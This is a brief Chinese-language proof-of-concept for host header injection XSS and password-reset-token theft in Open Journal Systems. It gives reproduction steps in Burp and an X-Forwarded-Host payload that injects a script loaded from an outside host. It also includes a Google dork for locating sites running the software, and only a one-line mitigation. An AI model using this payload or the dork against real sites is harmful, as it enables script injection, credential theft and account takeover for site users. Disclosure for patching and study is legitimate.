CVE-2022-24181 和 CVE-2022-26616。两者可能相同
Open-journal-system-漏洞
通过主机头注入的XSS及窃取其他用户的密码重置令牌
复现步骤:
- 访问此网站:https://who's-using-ojs-software.com
- 在Burp中捕获此请求,并发送到Repeater。
- 在Host Header之后添加此内容:X-Forwarded-Host: foo"><script src=//dtf.pw/2.js><x=".com
- 然后点击发送,之后右键点击请求并选择在浏览器中显示响应,然后复制该请求。
- 在浏览器中粘贴此请求,你会看到XSS弹窗。
缓解措施:更新到较新版本。
查找此漏洞的Google Dork
intitle:ojs
PKP供应商的Open-journal-system软件版本2.4.8至3.3.8均存在通过主机头注入的XSS漏洞及窃取密码重置令牌漏洞